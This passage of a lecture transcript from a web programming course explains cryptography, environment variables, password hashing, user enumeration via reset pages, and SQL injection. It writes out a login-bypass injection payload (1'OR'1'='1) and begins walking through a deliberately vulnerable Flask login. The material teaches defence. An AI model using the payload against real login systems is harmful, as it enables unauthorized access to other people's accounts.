behind cryptography. 413 00:18:14,650 --> 00:18:17,590 And so one form of cryptography you might hear about 414 00:18:17,590 --> 00:18:20,920 is secret key cryptography, where the idea there 415 00:18:20,920 --> 00:18:24,010 is that we have a secret key that only I know and only 416 00:18:24,010 --> 00:18:27,220 the person at the other computer that I want to communicate with knows. 417 00:18:27,220 --> 00:18:30,790 And that key can be used with my cryptographic algorithm 418 00:18:30,790 --> 00:18:32,500 to encrypt my plain text. 419 00:18:32,500 --> 00:18:37,030 I take my plain text and use my secret key to encrypt it into ciphertext. 420 00:18:37,030 --> 00:18:39,910 Or likewise, I can use the key to decrypt information. 421 00:18:39,910 --> 00:18:43,000 If I have ciphertext, something that's already been encrypted, 422 00:18:43,000 --> 00:18:45,790 I can use that key along with the ciphertext 423 00:18:45,790 --> 00:18:47,800 in order to generate plain text. 424 00:18:47,800 --> 00:18:50,860 And so you might imagine a diagram where I have one computer over here 425 00:18:50,860 --> 00:18:53,260 and I'm trying to communicate with a computer down there. 426 00:18:53,260 --> 00:18:57,750 I have this secret key, this ability to encrypt and decrypt information, 427 00:18:57,750 --> 00:19:00,250 and I also have the plain text of what it is that I actually 428 00:19:00,250 --> 00:19:05,470 want to encrypt, the message that I want to send from one place to the other. 429 00:19:05,470 --> 00:19:07,060 And so what might reasonably happen? 430 00:19:07,060 --> 00:19:10,030 What I do in secret key cryptography is first 431 00:19:10,030 --> 00:19:13,330 use the key to encrypt the plain text, generating 432 00:19:13,330 --> 00:19:16,090 some ciphertext, some encrypted version of the plain text 433 00:19:16,090 --> 00:19:19,300 that someone without the key wouldn't be able to understand. 434 00:19:19,300 --> 00:19:22,880 So then I would need to transfer the ciphertext to this computer. 435 00:19:22,880 --> 00:19:26,110 And if this computer has both the ciphertext and a copy of that same 436 00:19:26,110 --> 00:19:30,490 secret key, then they can use that key in order to decrypt that ciphertext 437 00:19:30,490 --> 00:19:34,000 and regenerate the plain text-- find out what it is that I actually intended 438 00:19:34,000 --> 00:19:34,810 to happen-- 439 00:19:34,810 --> 00:19:39,220 such that now, the plain text was never transferred from one computer 440 00:19:39,220 --> 00:19:40,060 to the other. 441 00:19:40,060 --> 00:19:42,850 I was only ever transferring the ciphertext 442 00:19:42,850 --> 00:19:45,520 from one computer to the other. 443 00:19:45,520 --> 00:19:48,381 Does anyone see a problem with what we just did there? 444 00:19:48,381 --> 00:19:50,380 It seems like no plain text is ever transferred. 445 00:19:50,380 --> 00:19:50,910 What could go wrong? 446 00:19:50,910 --> 00:19:51,342 Yeah? 447 00:19:51,342 --> 00:19:52,640 AUDIENCE: How do you send the key? 448 00:19:52,640 --> 00:19:52,930 BRIAN YU: Great. 449 00:19:52,930 --> 00:19:54,070 How do you send the key? 450 00:19:54,070 --> 00:19:58,270 That somehow, I need to have this key and the person over here 451 00:19:58,270 --> 00:20:00,160 also needs to have that key. 452 00:20:00,160 --> 00:20:03,252 And if I'm just sending the key over the internet from one computer 453 00:20:03,252 --> 00:20:04,960 to the other, which I would theoretically 454 00:20:04,960 --> 00:20:06,880 need to do because otherwise I have no way of communicating 455 00:20:06,880 --> 00:20:10,160 with the other computer, then we've just created the same problem again. 456 00:20:10,160 --> 00:20:13,240 That any of these routers, these intermediary pieces, 457 00:20:13,240 --> 00:20:16,780 over the course of this communication from computer A to computer B, 458 00:20:16,780 --> 00:20:20,176 could just intercept the key and intercept the ciphertext. 459 00:20:20,176 --> 00:20:22,300 And now they have all the pieces they need in order 460 00:20:22,300 --> 00:20:24,620 to regenerate the plain text. 461 00:20:24,620 --> 00:20:28,300 So this secret key cryptography works if and only 462 00:20:28,300 --> 00:20:31,630 if only I and only the other person have access to the key. 463 00:20:31,630 --> 00:20:35,440 And it doesn't work so well if this key is something 464 00:20:35,440 --> 00:20:39,160 that needs to be transferred plainly over the network in order 465 00:20:39,160 --> 00:20:42,740 to get to the other person, because then anyone could just intercept that key. 466 00:20:42,740 --> 00:20:44,269 And so how do we solve that problem? 467 00:20:44,269 --> 00:20:46,060 Well, one solution people have come up with 468 00:20:46,060 --> 00:20:48,410 is this idea of public key cryptography. 469 00:20:48,410 --> 00:20:50,830 And this is very common, and it's what HTTPS 470 00:20:50,830 --> 00:20:54,850 uses in order to securely transfer information over the internet. 471 00:20:54,850 --> 00:20:59,170 And the idea there is instead of having just one key, we have two keys. 472 00:20:59,170 --> 00:21:01,690 We have a public key and a private key. 473 00:21:01,690 --> 00:21:03,940 And these are related in a particularly important way, 474 00:21:03,940 --> 00:21:06,740 and the details have to do with a lot of mathematics. 475 00:21:06,740 --> 00:21:10,750 But the general idea is that the public key is something 476 00:21:10,750 --> 00:21:12,920 that you should be able to share with anyone, 477 00:21:12,920 --> 00:21:16,500 and the public key can only be used to encrypt information. 478 00:21:16,500 --> 00:21:18,940 It will take plain text and it'll generate 479 00:21:18,940 --> 00:21:20,752 the ciphertext, the encrypted version. 480 00:21:20,752 --> 00:21:22,460 But it doesn't go in the other direction. 481 00:21:22,460 --> 00:21:24,880 It can only be used to encrypt data. 482 00:21:24,880 --> 00:21:27,409 And likewise, the private key is something 483 00:21:27,409 --> 00:21:29,200 that you should only ever keep to yourself. 484 00:21:29,200 --> 00:21:31,660 You should never share your private key with anyone else. 485 00:21:31,660 --> 00:21:34,360 And the private key can be used to decrypt data. 486 00:21:34,360 --> 00:21:36,550 That if I have encrypted information that 487 00:21:36,550 --> 00:21:40,090 was encrypted using the public key, I can use the private key 488 00:21:40,090 --> 00:21:42,271 in order to decrypt it. 489 00:21:42,271 --> 00:21:44,020 So what does that model look like if I now 490 00:21:44,020 --> 00:21:46,720 have two computers that want to communicate with each other? 491 00:21:46,720 --> 00:21:48,670 I still have this computer over here that 492 00:21:48,670 --> 00:21:51,680 wants to send this plain text over to this computer, 493 00:21:51,680 --> 00:21:53,560 but wants to do so securely. 494 00:21:53,560 --> 00:21:55,630 So the first thing that's going to need to happen 495 00:21:55,630 --> 00:21:58,330 is that this computer, computer B down here, 496 00:21:58,330 --> 00:22:01,654 gives its public key to computer A. And that's 497 00:22:01,654 --> 00:22:04,570 OK because the public key is something that can be shared with anyone. 498 00:22:04,570 --> 00:22:07,150 Anyone's allowed to see it because the public key can only 499 00:22:07,150 --> 00:22:08,590 be used to encrypt data. 500 00:22:08,590 --> 00:22:11,060 It can't be used to decrypt data. 501 00:22:11,060 --> 00:22:14,920 And so now computer A, having access to the plain text and the public key, 502 00:22:14,920 --> 00:22:19,010 now has the ability to encrypt the plain text, generating the ciphertext. 503 00:22:19,010 --> 00:22:22,420 That ciphertext then gets transferred down to the other computer. 504 00:22:22,420 --> 00:22:26,140 And now computer B has both the ciphertext, this encrypted information 505 00:22:26,140 --> 00:22:29,350 that nobody along this path was able to read or see, 506 00:22:29,350 --> 00:22:33,130 and also has access to this private key that only they had access to. 507 00:22:33,130 --> 00:22:37,210 And that is the only thing that can be used in order to take the ciphertext 508 00:22:37,210 --> 00:22:40,700 and decrypt it and figure out what it is that the message actually is. 509 00:22:40,700 --> 00:22:44,940 And now computer B has the ability to regenerate the plain text from it. 510 00:22:44,940 --> 00:22:48,575 And so now we've been able to come up with a secure way of allowing computer 511 00:22:48,575 --> 00:22:51,380 A and computer B to communicate with each other, 512 00:22:51,380 --> 00:22:55,341 just by allowing them to use this public and private key pairing such 513 00:22:55,341 --> 00:22:57,590 that the public key is used to encrypt the information 514 00:22:57,590 --> 00:22:59,990 and is shared with everyone, and the private key is only 515 00:22:59,990 --> 00:23:01,820 used for decrypting the information. 516 00:23:01,820 --> 00:23:03,470 And it doesn't matter if the intermediaries have 517 00:23:03,470 --> 00:23:05,844 the public key because that just means other people might 518 00:23:05,844 --> 00:23:09,470 be able to encrypt the data, but not necessarily be 519 00:23:09,470 --> 00:23:11,992 able to decrypt that information. 520 00:23:11,992 --> 00:23:14,700 Questions about that or any problems that we see with that model? 521 00:23:14,700 --> 00:23:19,140 522 00:23:19,140 --> 00:23:20,040 OK. 523 00:23:20,040 --> 00:23:23,520 In that case, we'll go ahead and move on to talking 524 00:23:23,520 --> 00:23:27,501 about our next subject, which is going to be environment variables. 525 00:23:27,501 --> 00:23:29,250 And so environment variables are something 526 00:23:29,250 --> 00:23:32,771 we've seen a little bit of in Flask before, and probably in Django as well. 527 00:23:32,771 --> 00:23:34,770 But we'll talk about it in the context of trying 528 00:23:34,770 --> 00:23:36,730 to make our applications more secure. 529 00:23:36,730 --> 00:23:38,730 So we talked about, in the context of Git 530 00:23:38,730 --> 00:23:41,700 earlier, that we rarely, or probably never, 531 00:23:41,700 --> 00:23:45,027 want to put passwords or other secure, confidential information 532 00:23:45,027 --> 00:23:46,110 inside of our source code. 533 00:23:46,110 --> 00:23:50,530 Because as soon as we push a password or an access token to a GitHub repository, 534 00:23:50,530 --> 00:23:52,957 now suddenly anyone who has had access to that repository 535 00:23:52,957 --> 00:23:54,540 could theoretically be able to see it. 536 00:23:54,540 --> 00:23:57,660 Or if someone gets access to your GitHub account by some means or another, 537 00:23:57,660 --> 00:24:00,660 they would also be able to see that password or access token. 538 00:24:00,660 --> 00:24:03,930 Maybe that's going to be an access token that is the access token for getting 539 00:24:03,930 --> 00:24:05,880 access to your database, for instance. 540 00:24:05,880 --> 00:24:08,170 Or it's your access token for whatever cloud 541 00:24:08,170 --> 00:24:10,170 provider you're using, like Amazon Web Services, 542 00:24:10,170 --> 00:24:13,050 in order to deploy your application to the internet. 543 00:24:13,050 --> 00:24:16,830 So rather than doing something like this, where if you've used 544 00:24:16,830 --> 00:24:19,350 Flask before and have used their cookie-based sessions, 545 00:24:19,350 --> 00:24:21,825 you need to set a secret key inside of your application 546 00:24:21,825 --> 00:24:23,700 where you might have set a secret key to just 547 00:24:23,700 --> 00:24:28,020 be some random string of characters, which is totally fine from just running 548 00:24:28,020 --> 00:24:29,040 the application. 549 00:24:29,040 --> 00:24:31,230 This isn't all that secure because as soon 550 00:24:31,230 --> 00:24:34,140 as you push this file to the internet, now anyone 551 00:24:34,140 --> 00:24:36,360 who has access to your repository theoretically 552 00:24:36,360 --> 00:24:38,339 has access to your secret key as well. 553 00:24:38,339 --> 00:24:41,130 And so these are often times where we would want to use environment 554 00:24:41,130 --> 00:24:44,920 variables, using variables that are located just inside of the system 555 00:24:44,920 --> 00:24:48,270 on the computer where your program is running such that we can replace 556 00:24:48,270 --> 00:24:52,690 the key with os.environ.get("SECRET_KEY"). 557 00:24:52,690 --> 00:24:55,650 In other words, get the environment variable called secret key 558 00:24:55,650 --> 00:24:58,830 and use it as a secret key so that inside your code, now 559 00:24:58,830 --> 00:24:59,910 it just says this. 560 00:24:59,910 --> 00:25:03,750 So nobody who reads your code knows what the secret key for your application is, 561 00:25:03,750 --> 00:25:08,070 but only the computer on which this program is running that, theoretically, 562 00:25:08,070 --> 00:25:11,200 has that secret key set as one of its environment variables 563 00:25:11,200 --> 00:25:12,540 will then be able to use it. 564 00:25:12,540 --> 00:25:14,560 And so environment variables in that sense 565 00:25:14,560 --> 00:25:17,460 can be a very valuable tool when it comes 566 00:25:17,460 --> 00:25:20,460 to trying to make sure that we're not exposing information 567 00:25:20,460 --> 00:25:25,320 that we didn't want to expose when we were creating our application. 568 00:25:25,320 --> 00:25:29,580 Questions about environment variables? 569 00:25:29,580 --> 00:25:30,330 All right. 570 00:25:30,330 --> 00:25:31,530 So that was Flask. 571 00:25:31,530 --> 00:25:34,710 And let's go ahead now and move on to talking about SQL. 572 00:25:34,710 --> 00:25:37,020 So we talked a lot about databases and how 573 00:25:37,020 --> 00:25:39,150 we might go about designing databases. 574 00:25:39,150 --> 00:25:41,220 And in a couple of our projects now, we've 575 00:25:41,220 --> 00:25:45,000 had to create a table that is able to manage a database of users, where 576 00:25:45,000 --> 00:25:47,040 users are able to log in and log out. 577 00:25:47,040 --> 00:25:50,730 And in order to do that, we needed some sort of database structure in place 578 00:25:50,730 --> 00:25:54,369 such that users were able to be remembered by our system such 579 00:25:54,369 --> 00:25:56,910 that they could log in such that they had passwords and such. 580 00:25:56,910 --> 00:25:59,743 And you might imagine that a users table might have looked something 581 00:25:59,743 --> 00:26:03,510 like this, where each user has an ID, each user has a user name, 582 00:26:03,510 --> 00:26:06,010 each user has a password. 583 00:26:06,010 --> 00:26:09,855 What are potential design problems of security vulnerabilities 584 00:26:09,855 --> 00:26:11,480 with a table that's designed like this? 585 00:26:11,480 --> 00:26:14,290 586 00:26:14,290 --> 00:26:15,512 Yep? 587 00:26:15,512 --> 00:26:18,278 AUDIENCE: If someone gets their hands on the database, 588 00:26:18,278 --> 00:26:19,670 they can see all the passwords. 589 00:26:19,670 --> 00:26:19,970 BRIAN YU: Yeah. 590 00:26:19,970 --> 00:26:22,160 So obviously, we want to keep our tables secure. 591 00:26:22,160 --> 00:26:24,701 We don't want to let just anyone have access to our database. 592 00:26:24,701 --> 00:26:27,230 But if by some chance, someone got access to our database, 593 00:26:27,230 --> 00:26:30,380 either because they managed to figure out what the password is 594 00:26:30,380 --> 00:26:32,720 or they got access to it in some other way, now 595 00:26:32,720 --> 00:26:37,370 suddenly they have access to all of the different passwords that 596 00:26:37,370 --> 00:26:38,904 are inside of this database. 597 00:26:38,904 --> 00:26:40,820 They know what everyone's password is, and now 598 00:26:40,820 --> 00:26:42,620 that's a major security vulnerability. 599 00:26:42,620 --> 00:26:45,710 Especially if some of these users might be using these same passwords 600 00:26:45,710 --> 00:26:48,980 not only on one website, but on many other different websites. 601 00:26:48,980 --> 00:26:52,850 Now their password could be compromised across a number of different websites 602 00:26:52,850 --> 00:26:53,790 as well. 603 00:26:53,790 --> 00:26:58,017 And so what might be a solution here to avoiding needing to store the password 604 00:26:58,017 --> 00:26:58,850 inside of the table? 605 00:26:58,850 --> 00:27:00,470 And this might be something that you've already 606 00:27:00,470 --> 00:27:02,094 done in some of your existing projects. 607 00:27:02,094 --> 00:27:04,940 608 00:27:04,940 --> 00:27:06,405 AUDIENCE: Encrypt the passwords. 609 00:27:06,405 --> 00:27:07,030 BRIAN YU: Yeah. 610 00:27:07,030 --> 00:27:08,230 Encrypt the password. 611 00:27:08,230 --> 00:27:11,350 In other words, don't just store the plain text of the password, 612 00:27:11,350 --> 00:27:13,310 store some version of the password. 613 00:27:13,310 --> 00:27:15,310 And in particular, we'll generally store what we 614 00:27:15,310 --> 00:27:17,530 call a hashed version of the password. 615 00:27:17,530 --> 00:27:21,490 Where a hash function is just going to be some function inside of your code 616 00:27:21,490 --> 00:27:25,240 that takes text like a password and generates, 617 00:27:25,240 --> 00:27:29,350 deterministically, some long sequence of characters that's seemingly random that 618 00:27:29,350 --> 00:27:31,750 is associated with that text. 619 00:27:31,750 --> 00:27:35,620 And so every time you put hello in as the password and hash it, 620 00:27:35,620 --> 00:27:38,050 you'll always deterministically get the same output. 621 00:27:38,050 --> 00:27:40,550 And so then your users table might look something like this. 622 00:27:40,550 --> 00:27:43,420 Where you've got all of your users, but in your password column, 623 00:27:43,420 --> 00:27:46,150 instead of storing the actual password in plain text, 624 00:27:46,150 --> 00:27:49,090 you're storing some hashed version of that password. 625 00:27:49,090 --> 00:27:52,810 Such that hello generates this text as the password 626 00:27:52,810 --> 00:27:54,910 instead of just storing hello. 627 00:27:54,910 --> 00:27:58,900 So now if someone gets access to this database, 628 00:27:58,900 --> 00:28:01,650 they're still not going to be able to log into Anushree's account, 629 00:28:01,650 --> 00:28:04,108 for instance, if they go to the website because they're not 630 00:28:04,108 --> 00:28:08,950 going to know what password corresponded with this long sequence of characters. 631 00:28:08,950 --> 00:28:13,000 And generally, hash functions are designed to be one-way functions. 632 00:28:13,000 --> 00:28:16,870 That you can go from the plain text, the password, to this hashed version. 633 00:28:16,870 --> 00:28:19,540 But it's very, very computationally difficult to go backwards, 634 00:28:19,540 --> 00:28:22,450 to go from this hashed version to what the password originally 635 00:28:22,450 --> 00:28:24,880 was in order to generate this. 636 00:28:24,880 --> 00:28:29,300 And so what are the security implications of this model? 637 00:28:29,300 --> 00:28:30,880 How do we now log in a user, now? 638 00:28:30,880 --> 00:28:31,509 In this model. 639 00:28:31,509 --> 00:28:33,550 If someone were to log into a website, what logic 640 00:28:33,550 --> 00:28:35,508 would need to happen if we're no longer storing 641 00:28:35,508 --> 00:28:37,732 passwords but storing hashed passwords? 642 00:28:37,732 --> 00:28:38,232 Yeah? 643 00:28:38,232 --> 00:28:38,728 AUDIENCE: They could take the password they 644 00:28:38,728 --> 00:28:40,519 enter, you run through your hash algorithm, 645 00:28:40,519 --> 00:28:42,436 and you see if it matches what's in your file. 646 00:28:42,436 --> 00:28:43,269 BRIAN YU: Wonderful. 647 00:28:43,269 --> 00:28:45,220 User logs in with their user and password. 648 00:28:45,220 --> 00:28:47,710 You take that password and you hash it, and you check 649 00:28:47,710 --> 00:28:49,520 to make sure that the hash matches up. 650 00:28:49,520 --> 00:28:51,478 And because our hash function is deterministic, 651 00:28:51,478 --> 00:28:54,790 the same input will output the same output every, single time. 652 00:28:54,790 --> 00:28:57,250 If they did input the correct password, then the hashes 653 00:28:57,250 --> 00:28:59,920 should theoretically line up. 654 00:28:59,920 --> 00:29:02,020 Have you ever used a website before where, 655 00:29:02,020 --> 00:29:04,562 when you forget a password, your password, 656 00:29:04,562 --> 00:29:06,520 and you might want the website to just tell you 657 00:29:06,520 --> 00:29:08,965 what your password is, but the website says, sorry, 658 00:29:08,965 --> 00:29:12,940 we can't tell you what your password is, but we can let you reset your password. 659 00:29:12,940 --> 00:29:14,900 With this in mind, why might that be the case? 660 00:29:14,900 --> 00:29:18,472 Why can a website sometimes not tell you what your password 661 00:29:18,472 --> 00:29:19,930 is but still allow you to reset it? 662 00:29:19,930 --> 00:29:23,425 Or still be able to log you in if you knew your password? 663 00:29:23,425 --> 00:29:25,800 AUDIENCE: Because they're not storing it in text anymore. 664 00:29:25,800 --> 00:29:27,339 So we don't know-- 665 00:29:27,339 --> 00:29:28,380 BRIAN YU: Great, exactly. 666 00:29:28,380 --> 00:29:30,671 It's because of this idea of the one-way hash function. 667 00:29:30,671 --> 00:29:33,770 That if you take the password, you can generate this hashed version. 668 00:29:33,770 --> 00:29:35,894 But it's very difficult to go the other way around. 669 00:29:35,894 --> 00:29:39,851 Such that, if this is what I have access to in my database, I can look at this, 670 00:29:39,851 --> 00:29:42,350 and I don't actually know what Anushree's or Elle's password 671 00:29:42,350 --> 00:29:43,304 originally was. 672 00:29:43,304 --> 00:29:46,470 But if you give me their password, then I can hash it and compare it for you 673 00:29:46,470 --> 00:29:49,350 and maybe be able to tell you that as a result. 674 00:29:49,350 --> 00:29:51,650 But I could reset it if I wanted to just by replacing 675 00:29:51,650 --> 00:29:53,517 this field with some new hashed value. 676 00:29:53,517 --> 00:29:55,850 That would be something that I could do, but I might not 677 00:29:55,850 --> 00:29:58,144 be able to actually tell you what that password is. 678 00:29:58,144 --> 00:30:00,560 Of course, if these passwords are common, like these are-- 679 00:30:00,560 --> 00:30:03,800 if they're just passwords hello or password or 12345-- 680 00:30:03,800 --> 00:30:06,710 then how might I still be able to figure out a user's password 681 00:30:06,710 --> 00:30:10,870 even if the database looks like this? 682 00:30:10,870 --> 00:30:11,574 Yeah? 683 00:30:11,574 --> 00:30:13,912 AUDIENCE: You hash it and compare the hashes or if you 684 00:30:13,912 --> 00:30:15,370 can look for common hashes and see. 685 00:30:15,370 --> 00:30:16,310 BRIAN YU: Exactly. 686 00:30:16,310 --> 00:30:20,360 If you know what the hash function is, then someone trying to-- 687 00:30:20,360 --> 00:30:22,640 a malicious user trying to exploit the system 688 00:30:22,640 --> 00:30:26,180 might be able to just try a whole bunch of different common passwords, 689 00:30:26,180 --> 00:30:27,950 figure out what their hashed versions are, 690 00:30:27,950 --> 00:30:31,146 and then compare it to the versions that are here in order to figure out 691 00:30:31,146 --> 00:30:32,270 what the password might be. 692 00:30:32,270 --> 00:30:34,490 So even this is not a 100% foolproof. 693 00:30:34,490 --> 00:30:36,710 Someone who is trying a bunch of common passwords 694 00:30:36,710 --> 00:30:39,117 might still be able to figure out what it is 695 00:30:39,117 --> 00:30:40,700 that's going on inside of this system. 696 00:30:40,700 --> 00:30:42,950 And so that's certainly one vulnerability 697 00:30:42,950 --> 00:30:46,360 that could come up when we think about database design. 698 00:30:46,360 --> 00:30:48,110 But another vulnerability, and this is one 699 00:30:48,110 --> 00:30:50,235 we talked about a little bit a couple of weeks ago, 700 00:30:50,235 --> 00:30:52,610 but we'll dive into in a little more depth now-- 701 00:30:52,610 --> 00:30:54,797 well, actually, first, before we get there, sorry. 702 00:30:54,797 --> 00:30:56,630 So this was that Forgot Your Password screen 703 00:30:56,630 --> 00:30:58,838 that we were talking a little bit about before, where 704 00:30:58,838 --> 00:31:02,529 oftentimes what might happen is you'll type in an email address, for instance, 705 00:31:02,529 --> 00:31:04,070 and you'll click Reset Your Password. 706 00:31:04,070 --> 00:31:05,986 And that will send you an email that gives you 707 00:31:05,986 --> 00:31:08,610 the ability to reset your password. 708 00:31:08,610 --> 00:31:12,110 So another possible way the databases could be insecure, 709 00:31:12,110 --> 00:31:16,610 we might have vulnerabilities inside of the security of our database, 710 00:31:16,610 --> 00:31:20,330 is thinking about what information might be leaked by our database. 711 00:31:20,330 --> 00:31:22,970 What information can get out when we don't want it to get out? 712 00:31:22,970 --> 00:31:26,240 And can anyone see a potential vulnerability here, 713 00:31:26,240 --> 00:31:27,740 in terms of information leakage? 714 00:31:27,740 --> 00:31:30,740 Information that might be exposed that we might otherwise not want 715 00:31:30,740 --> 00:31:34,550 exposed, just from a user interface like this that people can use? 716 00:31:34,550 --> 00:31:37,938 717 00:31:37,938 --> 00:31:43,784 AUDIENCE: Your email address might be exposed as it's going over the web. 718 00:31:43,784 --> 00:31:44,450 BRIAN YU: Great. 719 00:31:44,450 --> 00:31:46,380 So your email address is potentially exposed 720 00:31:46,380 --> 00:31:48,070 as it's traveling from one point to another. 721 00:31:48,070 --> 00:31:50,570 Although, with HTTPS and trying to encrypt that information, 722 00:31:50,570 --> 00:31:52,730 usually we can help to defend against that. 723 00:31:52,730 --> 00:31:55,370 But certainly the idea of typing in an email address 724 00:31:55,370 --> 00:31:59,420 and clicking on reset password leads to potential information leakage 725 00:31:59,420 --> 00:32:00,830 in other potential ways. 726 00:32:00,830 --> 00:32:04,400 Whereby if I type in an email address of my account 727 00:32:04,400 --> 00:32:06,250 that I've perhaps forgotten my password to, 728 00:32:06,250 --> 00:32:09,208 or a friend's account that I think they've forgotten their password to, 729 00:32:09,208 --> 00:32:11,819 potentially, and I click Reset Password, then 730 00:32:11,819 --> 00:32:14,360 I might see a notification that very recently might just say, 731 00:32:14,360 --> 00:32:17,330 password reset email sent. 732 00:32:17,330 --> 00:32:21,320 What if I typed in the email address of someone who 733 00:32:21,320 --> 00:32:23,302 didn't have an account on the website? 734 00:32:23,302 --> 00:32:25,010 What might you expect this website to do? 735 00:32:25,010 --> 00:32:29,020 736 00:32:29,020 --> 00:32:29,520 Yeah? 737 00:32:29,520 --> 00:32:30,430 AUDIENCE: Give you an error message. 738 00:32:30,430 --> 00:32:31,610 BRIAN YU: Should give you an error of some sort. 739 00:32:31,610 --> 00:32:34,760 Something like, error, there is no such user with that email address. 740 00:32:34,760 --> 00:32:38,000 And now that we've seen those two screens, you type in an email address 741 00:32:38,000 --> 00:32:41,390 and sometimes you get password reset email sent and sometimes you get error, 742 00:32:41,390 --> 00:32:43,460 there is no user with that email address. 743 00:32:43,460 --> 00:32:46,210 Where is the potential information leakage here? 744 00:32:46,210 --> 00:32:46,710 Yeah? 745 00:32:46,710 --> 00:32:48,668 AUDIENCE: It could figure out who the users are 746 00:32:48,668 --> 00:32:49,964 by trying out different emails. 747 00:32:49,964 --> 00:32:50,630 BRIAN YU: Great. 748 00:32:50,630 --> 00:32:53,000 Now, by using this screen, even if I don't know people's passwords, 749 00:32:53,000 --> 00:32:55,940 I can figure out who has an account with this website and who doesn't, right? 750 00:32:55,940 --> 00:32:58,731 If it's a bank, for instance, and I type in someone's email address 751 00:32:58,731 --> 00:33:01,280 and I get this screen, password reset email sent, 752 00:33:01,280 --> 00:33:04,560 now I know that this particular user has an account with this bank. 753 00:33:04,560 --> 00:33:07,717 And that might not be something that your application wants to expose. 754 00:33:07,717 --> 00:33:09,800 And so as you go about designing web applications, 755 00:33:09,800 --> 00:33:12,000 you always want to be bearing these things in mind. 756 00:33:12,000 --> 00:33:15,800 Thinking about what information from the database is being exposed 757 00:33:15,800 --> 00:33:18,560 and how might information that I don't want to be exposed, 758 00:33:18,560 --> 00:33:20,720 might be exposed to users that I don't want 759 00:33:20,720 --> 00:33:22,190 to have access to that information. 760 00:33:22,190 --> 00:33:24,200 And certainly this is one potential example 761 00:33:24,200 --> 00:33:26,502 that maybe you don't really care if your users are 762 00:33:26,502 --> 00:33:29,210 able to know if other people have accounts on the website or not. 763 00:33:29,210 --> 00:33:33,320 But maybe in a place where it's more sensitive or more secure about 764 00:33:33,320 --> 00:33:35,960 whether or not a user has an account on the website or not, 765 00:33:35,960 --> 00:33:37,280 this might be something you do care about. 766 00:33:37,280 --> 00:33:39,071 And you'd want to think carefully about how 767 00:33:39,071 --> 00:33:41,840 you design the user interface, about how users are interacting 768 00:33:41,840 --> 00:33:43,673 with the database, and whether or not you're 769 00:33:43,673 --> 00:33:46,130 ever exposing information that you don't want 770 00:33:46,130 --> 00:33:49,524 to ultimately be exposed to the user. 771 00:33:49,524 --> 00:33:50,690 Questions about any of that? 772 00:33:50,690 --> 00:33:53,498 773 00:33:53,498 --> 00:33:54,910 OK. 774 00:33:54,910 --> 00:33:57,470 So now moving onto the topic about SQL and vulnerabilities 775 00:33:57,470 --> 00:34:00,850 that we did talk about a couple weeks ago, and namely that was SQL injection. 776 00:34:00,850 --> 00:34:04,640 And does anyone recall what SQL injection is and why it's a problem? 777 00:34:04,640 --> 00:34:05,420 Yeah? 778 00:34:05,420 --> 00:34:09,454 AUDIENCE: So in a SQL web class, we added or condition. 779 00:34:09,454 --> 00:34:10,120 BRIAN YU: Great. 780 00:34:10,120 --> 00:34:12,969 We were able to add an or condition, or more generally, 781 00:34:12,969 --> 00:34:17,210 just some sort of SQL code into input for instance, 782 00:34:17,210 --> 00:34:21,280 and get our own SQL code to run on someone else's server. 783 00:34:21,280 --> 00:34:24,760 So we were able to effectively do whatever we wanted with the database 784 00:34:24,760 --> 00:34:28,090 because we could run arbitrary SQL queries on that database. 785 00:34:28,090 --> 00:34:30,760 And so the example we looked at, which we'll 786 00:34:30,760 --> 00:34:33,100 look at an actual Flask example of that today, 787 00:34:33,100 --> 00:34:36,389 is a user name and password field where we 788 00:34:36,389 --> 00:34:38,139 might use that information on the back end 789 00:34:38,139 --> 00:34:40,389 to run a SQL query that looks something like this. 790 00:34:40,389 --> 00:34:43,510 Select star from users where user name equals 791 00:34:43,510 --> 00:34:47,590 whatever the user name was and password equals whatever the password was. 792 00:34:47,590 --> 00:34:50,984 And we imagine that if a user logs in, like Alice with the password hello, 793 00:34:50,984 --> 00:34:53,650 then we'd end up running a query that looks something like this, 794 00:34:53,650 --> 00:34:57,320 substituting in Alice as the username, hello as the password, 795 00:34:57,320 --> 00:35:00,310 and now we're selecting from all the users where Alice is the username 796 00:35:00,310 --> 00:35:01,670 and hello is the password. 797 00:35:01,670 --> 00:35:05,770 And if there is a matching one, then this will return a row, and otherwise, 798 00:35:05,770 --> 00:35:06,312 it won't. 799 00:35:06,312 --> 00:35:08,020 And of course, in this case, the password 800 00:35:08,020 --> 00:35:10,380 is not hashed, though in a more secure system, 801 00:35:10,380 --> 00:35:14,710 we might want to hash that password first and then run this query. 802 00:35:14,710 --> 00:35:16,490 But what might go wrong here? 803 00:35:16,490 --> 00:35:20,350 So we talked about what would happen if someone types in Alice as the user name 804 00:35:20,350 --> 00:35:27,760 and something like this as the password, 1'OR'1'='1, which seems sort 805 00:35:27,760 --> 00:35:31,510 of complicated, but the result of that was that when we plugged everything 806 00:35:31,510 --> 00:35:37,000 in, now we're selecting from users where the user name is Alice and the password 807 00:35:37,000 --> 00:35:38,650 is 1-- which it isn't-- 808 00:35:38,650 --> 00:35:41,200 or the string 1 equals the string 1. 809 00:35:41,200 --> 00:35:44,720 Well, this is, of course, true, and now we're going to get some row back. 810 00:35:44,720 --> 00:35:46,720 And so how might that actually work in practice? 811 00:35:46,720 --> 00:35:50,740 Let's take a look at a web application that implements this very idea of just 812 00:35:50,740 --> 00:35:53,590 a very simple login system where an exploit like this 813 00:35:53,590 --> 00:35:57,500 can help anyone get access to any other user account. 814 00:35:57,500 --> 00:36:03,790 So let's take a look at injection and application.py. 815 00:36:03,790 --> 00:36:09,430 So this is just a Flask application, and our default route, 816 00:36:09,430 --> 00:36:14,169 this index route, first checks if there is a username inside of the session. 817 00:36:14,169 --> 00:36:16,460 If there is a user name in the session, in other words, 818 00:36:16,460 --> 00:36:18,480 if someone is logged into this current session, 819 00:36:18,480 --> 00:36:21,710 we'll go ahead and render a user.html page that will just display 820 00:36:21,710 --> 00:36:23,750 who's currently logged in for instance. 821 00:36:23,750 --> 00:36:25,750 Otherwise, if there is no user, then we're 822 00:36:25,750 --> 00:36:29,380 going to go ahead and render a login.html page that would give people 823 00:36:29,380 --> 00:36:32,410 the option to log into this website. 824 00:36:32,410 --> 00:36:37,220 And now, let's take a look at what's happening inside of the login function. 825 00:36:37,220 --> 00:36:42,220 So first thing we're doing is someone logs in by submitting a post request 826 00:36:42,220 --> 00:36:43,870 to /login. 827 00:36:43,870 --> 00:36:47,170 Then we get the user name by going request.form.get("username"). 828 00:36:47,170 --> 00:36:49,710 We get the password by request.form.get("password"), 829 00:36:49,710 --> 00:36:51,979 just extracting that information from the form. 830 00:36:51,979 --> 00:36:53,770 We're going to print out what the query is. 831 00:36:53,770 --> 00:36:55,670 You'll see an example of that in a moment, 832 00:36:55,670 --> 00:36:57,220 